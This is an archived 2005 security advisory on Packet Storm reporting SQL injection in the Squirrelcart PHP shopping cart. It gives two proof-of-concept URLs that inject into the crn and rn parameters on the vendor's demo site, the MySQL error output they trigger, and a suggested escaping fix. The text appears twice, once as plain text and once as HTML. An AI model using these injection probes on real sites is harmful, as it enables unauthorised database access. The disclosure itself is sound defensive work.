exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

squirrelSQL.txt

squirrelSQL.txt
Posted Mar 30, 2005
Authored by Diabolic Crab | Site hackerscenter.com

Squirrelcast PHP Shopping Cast is susceptible to SQL injection attacks. Sample exploitation details provided.

tags | exploit, php, sql injection
SHA-256 | 9034a1b7791dbb49ea62cba1ba3aa5f0d0c0d09c6551a60c8ca3c2d2764fd09e

squirrelSQL.txt

Change Mirror Download
This is a multi-part message in MIME format.

------=_NextPart_000_0082_01C534CE.223E4220
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/
Severity: Medium
Title: Squirrelcart PHP Shopping Cart SQL Injection
Date: 30/03/2005

Vendor: Squirrelcart
Vendor Website: http://squirrelcart.com
Summary: There are, squirrelcart php shopping cart sql injection.

Proof of Concept Exploits:=20

http://demo.squirrelcart.com/index.php?crn=3D'SQL_INJECTION&action=3Dshow=
&show_products_mode=3Dcat_click&PHPSESSID=3D2069dbe1646bdc46e4e78718e76e6=
d15
Sql injection

MySQL error: You have an error in your SQL syntax; check the manual that =
corresponds to your MySQL server version for the right syntax to use =
near '\'SQL_INJECTION' at line 1
Query was: SELECT View_Products_per_View FROM Categories WHERE =
record_number =3D \'SQL_INJECTION=20


http://demo.squirrelcart.com/index.php?crn=3D0&rn=3D&action=3Dshow_detail=
&PHPSESSID=3D2069dbe1646bdc46e4e78718e76e6d15
Sql injection

MySQL error: You have an error in your SQL syntax; check the manual that =
corresponds to your MySQL server version for the right syntax to use =
near '' at line 1
Query was: SELECT Table_2 FROM REL_Products__Sales_Agreement WHERE =
Table_1 =3D
MySQL error: You have an error in your SQL syntax; check the manual that =
corresponds to your MySQL server version for the right syntax to use =
near '' at line 4
Query was: SELECT DISTINCT d. * FROM Discounts d LEFT JOIN =
REL_Products__Discounts pd ON d.record_number =3D pd.Table_2 WHERE =
pd.Table_1 =3D
MySQL error: You have an error in your SQL syntax; check the manual that =
corresponds to your MySQL server version for the right syntax to use =
near '' at line 1
Query was: SELECT Table_2 FROM REL_Products__Categories WHERE Table_1 =
=3D=20
MySQL error: You have an error in your SQL syntax; check the manual that =
corresponds to your MySQL server version for the right syntax to use =
near '' at line 4
Query was: SELECT DISTINCT d. * FROM Discounts d LEFT JOIN =
REL_Products__Discounts pd ON d.record_number =3D pd.Table_2 WHERE =
pd.Table_1 =3D
MySQL error: You have an error in your SQL syntax; check the manual that =
corresponds to your MySQL server version for the right syntax to use =
near '' at line 1
Query was: SELECT Table_2 FROM REL_Products__Categories WHERE Table_1 =
=3D=20


Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(), =
mysql_real_escape_string() and other functions for input validation =
before passing user input to the mysql database, or before echoing data =
on the screen, would solve these problems.

Author:=20
These vulnerabilties have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. =
Lookout for my soon to come out book on Secure coding with php.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQkm9TiZV5e8av/DUEQL7YgCcDO1d4A345g0elrACK0qWZJUp3HkAoOuf
qBVrmet537qezReYIZkVju8Y
=3DclQ/
-----END PGP SIGNATURE-----

------=_NextPart_000_0082_01C534CE.223E4220
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED =
MESSAGE-----<BR>Hash:=20
SHA1</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A><BR><A=20
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=
BR>Severity:=20
Medium<BR>Title: Squirrelcart PHP Shopping Cart SQL Injection<BR>Date:=20
30/03/2005</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Vendor: Squirrelcart<BR>Vendor Website: =
<A=20
href=3D"http://squirrelcart.com">http://squirrelcart.com</A><BR>Summary: =
There=20
are, squirrelcart php shopping cart sql injection.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits: =
</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"http://demo.squirrelcart.com/index.php?crn=3D'SQL_INJECTION&a=
ction=3Dshow&show_products_mode=3Dcat_click&PHPSESSID=3D2069dbe16=
46bdc46e4e78718e76e6d15">http://demo.squirrelcart.com/index.php?crn=3D'SQ=
L_INJECTION&action=3Dshow&show_products_mode=3Dcat_click&PHPS=
ESSID=3D2069dbe1646bdc46e4e78718e76e6d15</A><BR>Sql=20
injection</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>MySQL error: You have an error in your =
SQL syntax;=20
check the manual that corresponds to your MySQL server version for the =
right=20
syntax to use near '\'SQL_INJECTION' at line 1<BR>Query was: SELECT=20
View_Products_per_View FROM Categories WHERE record_number =3D =
\'SQL_INJECTION=20
</FONT></DIV>
<DIV>&nbsp;</DIV><FONT face=3DArial size=3D2>
<DIV><BR><A=20
href=3D"http://demo.squirrelcart.com/index.php?crn=3D0&rn=3D&acti=
on=3Dshow_detail&PHPSESSID=3D2069dbe1646bdc46e4e78718e76e6d15">http:/=
/demo.squirrelcart.com/index.php?crn=3D0&rn=3D&action=3Dshow_deta=
il&PHPSESSID=3D2069dbe1646bdc46e4e78718e76e6d15</A><BR>Sql=20
injection</DIV>
<DIV>&nbsp;</DIV>
<DIV>MySQL error: You have an error in your SQL syntax; check the manual =
that=20
corresponds to your MySQL server version for the right syntax to use =
near '' at=20
line 1<BR>Query was: SELECT Table_2 FROM REL_Products__Sales_Agreement =
WHERE=20
Table_1 =3D<BR>MySQL error: You have an error in your SQL syntax; check =
the manual=20
that corresponds to your MySQL server version for the right syntax to =
use near=20
'' at line 4<BR>Query was: SELECT DISTINCT d. * FROM Discounts d LEFT =
JOIN=20
REL_Products__Discounts pd ON d.record_number =3D pd.Table_2 WHERE =
pd.Table_1=20
=3D<BR>MySQL error: You have an error in your SQL syntax; check the =
manual that=20
corresponds to your MySQL server version for the right syntax to use =
near '' at=20
line 1<BR>Query was: SELECT Table_2 FROM REL_Products__Categories WHERE =
Table_1=20
=3D <BR>MySQL error: You have an error in your SQL syntax; check the =
manual that=20
corresponds to your MySQL server version for the right syntax to use =
near '' at=20
line 4<BR>Query was: SELECT DISTINCT d. * FROM Discounts d LEFT JOIN=20
REL_Products__Discounts pd ON d.record_number =3D pd.Table_2 WHERE =
pd.Table_1=20
=3D<BR>MySQL error: You have an error in your SQL syntax; check the =
manual that=20
corresponds to your MySQL server version for the right syntax to use =
near '' at=20
line 1<BR>Query was: SELECT Table_2 FROM REL_Products__Categories WHERE =
Table_1=20
=3D </DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>Possible fix: The usage of htmlspeacialchars(), =
mysql_escape_string(),=20
mysql_real_escape_string() and other functions for input validation =
before=20
passing user input to the mysql database, or before echoing data on the =
screen,=20
would solve these problems.</DIV>
<DIV>&nbsp;</DIV>
<DIV>Author: <BR>These vulnerabilties have been found and released by =
Diabolic=20
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =
free to=20
contact me regarding these vulnerabilities. You can find me at, <A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or <A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A>.=20
Lookout for my soon to come out book on Secure coding with php.</DIV>
<DIV>&nbsp;</DIV>
<DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed =
for=20
commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>iQA/AwUBQkm9TiZV5e8av/DUEQL7YgCcDO1d4A345g0elrACK0qWZJUp3HkAoOuf<BR>=
qBVrmet537qezReYIZkVju8Y<BR>=3DclQ/<BR>-----END=20
PGP SIGNATURE-----<BR></FONT></DIV></BODY></HTML>

------=_NextPart_000_0082_01C534CE.223E4220--
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close